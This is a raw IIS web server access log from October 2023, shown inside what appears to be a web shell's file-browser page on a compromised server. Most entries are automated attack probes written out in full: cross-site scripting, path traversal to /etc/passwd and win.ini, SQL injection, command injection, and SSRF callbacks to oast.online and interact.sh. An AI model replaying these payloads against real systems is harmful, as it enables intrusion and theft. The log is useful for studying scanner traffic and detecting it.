????

Your IP : 216.73.216.234


Current Path : C:/inetpub/logs/LogFiles/W3SVC18/
Upload File :
Current File : C:/inetpub/logs/LogFiles/W3SVC18/u_ex231013.log

#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-10-13 00:02:02
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-10-13 00:02:02 103.153.214.94 GET /webadmin/pkg command=<script>alert(document.cookie)</script> 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 206
2023-10-13 00:02:11 103.153.214.94 GET /typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php file=../../../../../../../LocalConfiguration.php 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 207
2023-10-13 00:03:41 103.153.214.94 GET /cgi-bin/webproc getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 208
2023-10-13 00:04:19 103.153.214.94 GET /esp/cms_changeDeviceContext.esp device=aaaaa:a%27";user|s."1337"; 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 206
2023-10-13 00:05:03 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 207
2023-10-13 00:05:05 103.153.214.94 GET /2WfF0TwgJgSMAlpMTGB8pwfkUMw.php/x0A - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 204
2023-10-13 00:05:30 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 207
2023-10-13 00:05:32 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 00:07:22 103.153.214.94 GET /.env - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 204
2023-10-13 00:07:23 103.153.214.94 GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 00:07:39 103.153.214.94 POST /wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php %3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 209
2023-10-13 00:08:29 103.153.214.94 GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 207
2023-10-13 00:09:38 103.153.214.94 GET /plus/recommend.php action&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 206
2023-10-13 00:10:35 103.153.214.94 GET /CMSInstall/install.aspx - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 209
2023-10-13 00:11:03 103.153.214.94 POST / - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 209
2023-10-13 00:13:20 103.153.214.94 GET / author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 589
2023-10-13 00:18:04 103.153.214.94 GET /wp-content/plugins/qards/html2canvasproxy.php url=https://ckjv7uic8b6p3donsoogabcq3d6n1kbc6.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 207
2023-10-13 00:18:19 103.153.214.94 GET /composer/send_email to=oAeI@pRwj&url=http://ckjv7uic8b6p3donsoog8ydcqwx9uxfyh.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 205
2023-10-13 00:21:38 103.153.214.94 POST /wls-wsat/RegistrationRequesterPortType - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 207
2023-10-13 00:21:42 103.153.214.94 GET /OA_HTML/cabo/jsps/a.jsp _t=fredRC&configName&redirect=%2f%5cinteract.sh 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 204
2023-10-13 00:22:35 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:40.0)+Gecko/20100101+Firefox/40.1';alert(/XSS/);// - 200 0 0 212
2023-10-13 00:23:30 103.153.214.94 GET /wp-json/wp/v2/users/ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 207
2023-10-13 00:23:33 103.153.214.94 GET / rest_route=/wp/v2/users/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 207
2023-10-13 00:23:41 103.153.214.94 GET /passwordrecovered.cgi id=xfRW6 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 205
2023-10-13 00:24:19 103.153.214.94 GET /login.php mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 207
2023-10-13 00:26:19 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 212
2023-10-13 00:26:24 103.153.214.94 GET /image/image:/..%2fetc%2fpasswd - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 11 0 205
2023-10-13 00:27:15 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 233
2023-10-13 00:27:17 103.153.214.94 GET /hw-sys.htm - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 204
2023-10-13 00:27:31 103.153.214.94 OPTIONS / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 209
2023-10-13 00:27:34 103.153.214.94 POST /clients/editclient.php id=2WfF0hoGLDyBFYfVsX6x7oPKx3D&action=update 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 204
2023-10-13 00:27:36 103.153.214.94 GET /logos_clients/2WfF0hoGLDyBFYfVsX6x7oPKx3D.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 208
2023-10-13 00:29:12 103.153.214.94 GET /magmi/web/ajax_gettime.php prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 207
2023-10-13 00:31:36 103.153.214.94 GET /system/deviceInfo auth=YWRtaW46MTEK 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 212
2023-10-13 00:32:37 103.153.214.94 GET /verify.php id=1&confirm_hash 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 206
2023-10-13 00:32:39 103.153.214.94 GET /mantis/verify.php id=1&confirm_hash 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 00:32:41 103.153.214.94 GET /mantisBT/verify.php id=1&confirm_hash 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 203
2023-10-13 00:32:43 103.153.214.94 GET /mantisbt-2.3.0/verify.php id=1&confirm_hash 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 203
2023-10-13 00:32:46 103.153.214.94 GET /bugs/verify.php confirm_hash&id=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 202
2023-10-13 00:33:19 103.153.214.94 GET /current_config/passwd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 207
2023-10-13 00:35:07 103.153.214.94 GET /current_config/Sha1Account1 - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 200 0 0 208
2023-10-13 00:36:39 103.153.214.94 GET /index.php option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(999999999)),1) 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 207
2023-10-13 00:37:10 103.153.214.94 GET /Telerik.ReportViewer.axd optype=Parameters&bgColor=_000000%22onload=%22prompt(1) 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 207
2023-10-13 00:37:28 103.153.214.94 GET /wp-content/plugins/raygun4wp/sendtesterror.php backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 205
2023-10-13 00:41:32 103.153.214.94 GET /base_import/static/c:/windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 207
2023-10-13 00:41:34 103.153.214.94 GET /base_import/static/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 203
2023-10-13 00:41:40 103.153.214.94 GET /plugins/servlet/oauth/users/icon-uri consumerUri=http://ckjv7uic8b6p3donsoog9kkc4uctrchrp.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 205
2023-10-13 00:42:59 103.153.214.94 POST /integration/saveGangster.action - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 207
2023-10-13 00:43:33 103.153.214.94 GET /__ - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 206
2023-10-13 00:43:33 103.153.214.94 GET /cgi-bin/wapopen B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 208
2023-10-13 00:44:22 103.153.214.94 POST /struts2-rest-showcase/orders/3 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 205
2023-10-13 00:44:24 103.153.214.94 POST /orders/3 - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 405 0 1 205
2023-10-13 00:46:03 103.153.214.94 GET /dumpmdm.cmd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 205
2023-10-13 00:47:02 103.153.214.94 GET /+CSCOE+/files/file_list.json path=/sessions 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 11 0 205
2023-10-13 00:47:55 103.153.214.94 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 207
2023-10-13 00:47:57 103.153.214.94 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 203
2023-10-13 00:47:59 103.153.214.94 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 205
2023-10-13 00:48:01 103.153.214.94 GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 206
2023-10-13 00:48:02 103.153.214.94 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 205
2023-10-13 00:48:09 103.153.214.94 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 00:48:29 103.153.214.94 GET /api/jolokia/read<svg+onload=alert(document.domain)> mimeType=text/html 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 400 0 0 1099
2023-10-13 00:48:29 103.153.214.94 POST /jolokia/read/getDiagnosticOptions - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 205
2023-10-13 00:48:31 103.153.214.94 GET /jolokia/read<svg+onload=alert(document.domain)> mimeType=text/html 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 204
2023-10-13 00:50:58 103.153.214.94 POST /cobbler_api - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 205
2023-10-13 00:54:03 103.153.214.94 GET / - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 638
2023-10-13 00:54:30 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword apiUrl=http://ckjv7uic8b6p3donsoogmpp3r9b73799t.oast.online 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 206
2023-10-13 00:56:35 103.153.214.94 GET /sympa referer=http://interact.sh&passwd&previous_action&action=login&action_login&previous_list&list&email 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 206
2023-10-13 00:56:58 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 206
2023-10-13 01:01:12 103.153.214.94 GET /command.cgi cat%20/etc/passwd 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 01:02:04 103.153.214.94 GET /dolibarr/adherents/cartes/carte.php mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print 443 - 193.123.37.162 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 207
2023-10-13 01:02:46 103.153.214.94 GET /global-protect/login.esp user=j%22;-alert(1)-%22x 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 206
2023-10-13 01:03:33 103.153.214.94 GET /index.php debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 206
2023-10-13 01:05:18 103.153.214.94 POST /GponForm/diag_Form images/ 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 212
2023-10-13 01:05:20 103.153.214.94 POST /GponForm/diag_Form images/ 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 204
2023-10-13 01:05:33 103.153.214.94 GET /uir/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 204
2023-10-13 01:05:51 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 207
2023-10-13 01:05:53 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 202
2023-10-13 01:05:55 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 205
2023-10-13 01:05:57 103.153.214.94 GET /..../..../..../..../..../..../..../..../..../windows/win.ini - 443 - 193.123.37.162 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 209
2023-10-13 01:06:04 103.153.214.94 GET /chkisg.htm?Sip=1.1.1.1+|+cat+/etc/passwd - 443 - 193.123.37.162 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 631
2023-10-13 01:06:11 103.153.214.94 POST /system/sharedir.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 205
2023-10-13 01:06:13 103.153.214.94 POST /en/php/usb_sync.php - 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 203
2023-10-13 01:08:09 103.153.214.94 POST /admin/index.php id=pages 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 216
2023-10-13 01:10:31 103.153.214.94 POST /upload/index.php route=extension/payment/divido/update 443 - 193.123.37.162 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 205
2023-10-13 01:13:06 103.153.214.94 GET / - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 275
2023-10-13 01:13:06 103.153.214.94 GET /runtime-es5.js - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 277
2023-10-13 01:13:08 103.153.214.94 GET /polyfills-es5.js - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1458
2023-10-13 01:13:17 103.153.214.94 GET /styles-es5.js - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 8406
2023-10-13 01:14:06 103.153.214.94 GET /vendor-es5.js - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 49131
2023-10-13 01:14:08 103.153.214.94 GET /main-es5.js - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1088
2023-10-13 01:14:16 103.153.214.94 GET /data-table.eot - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 268
2023-10-13 01:14:17 103.153.214.94 GET /data-table.eot - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 267
2023-10-13 01:14:18 103.153.214.94 GET /data-table.woff - 443 - 192.3.50.140 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 978
